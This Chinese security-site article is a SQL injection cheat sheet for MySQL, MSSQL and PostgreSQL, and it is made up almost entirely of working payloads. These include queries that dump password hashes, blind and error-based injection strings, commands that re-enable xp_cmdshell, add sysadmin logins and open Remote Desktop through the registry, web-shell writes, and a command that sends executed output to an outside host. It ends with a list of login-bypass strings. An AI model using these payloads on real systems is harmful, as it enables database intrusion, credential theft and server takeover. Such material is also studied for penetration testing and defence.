设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:SecYe > 网络安全 > Web安全 > 正文

WEB安全渗透之SQL 注入

时间:2016-12-06 10:41 来源:未知 作者:SecYe安全 阅读:

SQL 注入(SQL injection),是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入 SQL 指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的 SQL 指令而运行,因此遭到破坏或是入侵。

SQL 注入类型

回显型注入

基于整型注入

基于字符串注入

基于搜索型注入

盲注

基于错误型盲注

基于布尔型盲注

基于时间型盲注

特殊形式注入

宽字符注入

HTTP 头注入

referer 注入

host 注入

cookies 注入

伪静态注入

Base64 变形注入

系统命令注入

XML 外部实体注入攻击(XXE 攻击)

SQL 注入语句

下面收集各种数据库系统常用的注入语句。

MySQL

基本环境信息

# 获取版本号
SELECT @@version
SELECT version()

# 主机名,IP 地址
SELECT @@hostname;

# 数据目录
SELECT @@datadir;

# 用户名及密码
SELECT host, user, password FROM mysql.user;

# 用户名
SELECT user();
SELECT system_user();
SELECT user FROM mysql.user;
SELECT current_user;

用户权限相关

# 列举用户权限
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;

# 列举用户权限
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv,Grant_priv,References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv,Repl_client_priv FROM mysql.user;

# 列举数据库权限
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;

# 列举 columns_priv
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

列举数据库

# 当前库
SELECT database();

# 所有库 (Mysql > 5.0)
SELECT schema_name FROM information_schema.schemata;

列举表名

# 常规
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

# 根据列名找表名
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

列举字段名

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

单条数据获取

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0;

SELECT host,user FROM user ORDER BY host LIMIT 0,1;

显错注入

# 方式 1
and (select 1 from (select count(*),concat(SQL 语句,floor(rand(0)*2))x from information_schema.tables group by x)a);

# 方式 2
and (select count(*) from (select 1 union select null union select !1)x group by concat(SQL 语句,floor(rand(0)*2)));

# 方式 3
and extractvalue(1, concat(0x5c, (SQL 语句)));

# 方式 4
and 1=(updatexml(1,concat(0x5e24,(SQL 语句),0x5e24),1));

延时注入

SELECT BENCHMARK(1000000,MD5('A'));

SELECT SLEEP(5); # >= 5.0.12

文件读写

# 读取文件,需要相关权限
UNION SELECT LOAD_FILE('/etc/passwd')

# 写入文件,需要相关权限
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'

# 写入文件,需要相关权限
SELECT * FROM mytable INTO outfile '/tmp/somefile'

判断及字符串相关

# if 判断
SELECT if(1=1,'foo','bar'); #返回 foo

# CASE WHEN 判断
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # 返回 A

# char 函数,将数字转变为字符
SELECT char(65); #返回 A

# ascii 函数,将字符转变为数字
SELECT ascii('A'); #返回 65

# CONCAT 函数,将字符连接在一起
SELECT CONCAT('A','B'); #returns AB

# 字符串的 16 进制写法
SELECT 0×414243; # 返回 ABC

# substring/substr 函数
SELECT substr('abcd', 3, 1); #返回 c

# length 函数
SELECT length('abcd'); #返回 4

MSSQL

基本环境信息

# 数据库版本
SELECT @@version

# 主机名,IP 地址
SELECT HOST_NAME()

# 当前用户
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

# 列出所有用户
SELECT name FROM master..syslogins

# 列密码 MSSQL 2000
SELECT name, password FROM master..sysxlogins  --*
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins --*

# 列密码 MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins --*
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins --*

列举数据库

# 当前库
SELECT DB_NAME()

# 列举库
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — 其中 N = 0, 1, 2,

列举表名

# 列举表
SELECT name FROM 库名..sysobjects WHERE xtype = 'U';

# 根据字段名列表名
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM 库名..sysobjects JOIN 库名..syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%字段名%'

列举字段名

# 列举当前库中的表的字段
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '表名');

# 列举 master 库中的表的字段
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='表名';

单条数据获取

# 获取第 XXX 条数据
SELECT TOP 1 name FROM (SELECT TOP XXX name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC

权限相关

# 判断当前用户权限
SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('dbcreator');
SELECT is_srvrolemember('bulkadmin');
SELECT is_srvrolemember('diskadmin');
SELECT is_srvrolemember('processadmin');
SELECT is_srvrolemember('serveradmin');
SELECT is_srvrolemember('setupadmin');
SELECT is_srvrolemember('securityadmin');

# 判断某指定用户的权限
SELECT is_srvrolemember('sysadmin', 'sa');

# 判断是否是库权限
and 1=(Select IS_MEMBER('db_owner'))

# 判断是否有库读取权限
and 1= (Select HAS_DBACCESS('master'))

# 获取具有某个权限的用户名
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;

# 当前所拥有的权限
SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); — current database
SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); — current server
SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); –permissions on a table
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');

显错注入

# 直接与数字比较
id=1 and @@version>0--
id=1 and user>0--
id=1 and db_name()>0--

# 将数据转换成整数致报错,可用于爆库名,表名,数据名
id=1 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))--

# having 1=1 爆数据
id=13 having 1=1 --
id=13 group by 表名.字段名1,字段名2 having 1=1 --

延时注入

# 延时 3 秒
IF(ascii(SUBSTRING('name',1,1))>0) waitfor delay'0:0:3'

命令执行

# 判断功能是否存在
and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread') #注册表
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask') #备份
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc') #恢复扩展
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs') #读取子目录
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree') #列目录

# 恢复与删除扩展
exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
exec sp_dropextendedproc 'xp_cmdshell'
# 恢复 xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'show advanced options', 0 --

# 访问 COM 组件
;declare @s int;
;exec sp_oacreat 'wscript.shell',@s
;exec master..spoamethod @s,'run',null,'cmd.exe/c dir c:\

# 执行命令
EXEC xp_cmdshell 'net user';

# 写注册表
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

# 读注册表
create table labeng(lala nvarchar(255), id int);
DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result); #读网站目录

# 写 Shell
exec master.dbo.xp_cmdshell 'echo ^<%eval request("o")%^> >E:\wwwroot\1.asp'; --

# 停掉或激活某个服务
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

# 添加、删除、设置用户为DBA的操作
EXEC sp_addlogin 'user', 'pass';
EXEC sp_droplogin 'user';
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';

# 获取 DB 文件位置信息
EXEC sp_helpdb master; -- master.mdf 位置

文件读写

# 文件读取 (创建临时表,bulk insert 读取内容到表)
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;

# 文件读取 (创建临时表,insert & xp_cmdshell 读取内容)
create table mytmp(data varchar(4000)); --
insert mytmp exec master.dbo.xp_cmdshell 'ipconfig /all'; --

# 页面无回显时,读取命令执行内容 (需目标机器可连外网) (先写入 JavaScrip,然后通过执行 JavaScrip 将命令执行内容,通过 AJAX 发送给接收端)
exec master.dbo.xp_cmdshell 'echo (function(){var ws=new ActiveXObject("WScript.shell"),cmd="cmd.exe /c dir c:\\";var data=ws.exec(cmd).stdout.ReadAll();var ajax=new ActiveXObject("Microsoft.xmlhttp");ajax.open("POST","http://itsokla.duapp.com/cmd.php",false);ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");ajax.send("cmd="+encodeURIComponent(cmd)+"&data="+encodeURIComponent(encodeURIComponent(data)));})() > c:\e.js' --

Oracle

待完善

MongoDB

待完善

PostgreSQL

显示版本

select version();

union select 1,2,...n,version()

//version()函数与MySQL的是一样的

从已知表段字段爆数据

select aa from bb where cc=dd;

union select 1,2,....n,aa from bb where cc=dd

//所有的SQL语法几乎都是这样的语法来爆数据

列库

select datname from pg_database;

union select 1,2,....,n,datname from pg_database;

列数据库中的表段

select relname from pg_stat_user_tables limit 1 offset n;

//类似于MySQL中的information_schema.tables,虽然不大恰当

union select relname from pg_stat_user_tables limit 1 offset 3;

//limit 1 offset 0和MySQL的limit 0,1一个效果。

列表段中的字段

select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;

union select 1,2,.....,n,column_name from information_schema.columns where table_name=0x3a limit 1 offset 5

读取配置信息,例如数据库登陆账户和密码

select usename,passwd from pg_shadow;

union select 1,2,...n,usename,passwd from pg_shadow

//pg_shadow数据库类似于MySQL中的mysql数据库

读取文件

create table test(code text);

copy test from '/etc /passwd'with delimiter E'\t';

(注:网上多数关于Postgresql的语句中是双引号,实际测试,8.x到9.x双引号无效,应该用双引号)

写入文件

insert into test values ('<?php eval($_POST["cmd"];?>');

copy test(code) to ”/var/www/one.php”;

Access

待完善

Ingres

待完善

IBM DB2

待完善

IBM Informix

待完善

SQL 注入后台万能密码

</nowiki>
'or'='or'
'or='
'or ='
" or "a"="a
"or "a"="a
"or 1=1--
"or 1=1%00
"or"="a'='a
"or=or"
') or ('a'='a
')or('a'='a
1 or '1'='1' or 1=1
1 or '1'='1'=1
1'or'1'='1
admin' or 'a'='a 密码随便
admin'or'1'='1'--
admin' or '1'='1'--
a'or' 1=1--
a 'or' 1=1--
or 1=1--
'or 1=1--
'or' '1'='1
or 1=1-- '
'OR 1=1%00
or 'a'='a
'or'='1'
'or=or='
' or =or='
'or'1'='1
' or '1'='1
'or'a'='a
' or 'a'='a
'xor
' UNION Select 1,1,1 FROM admin Where ='</nowiki>

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%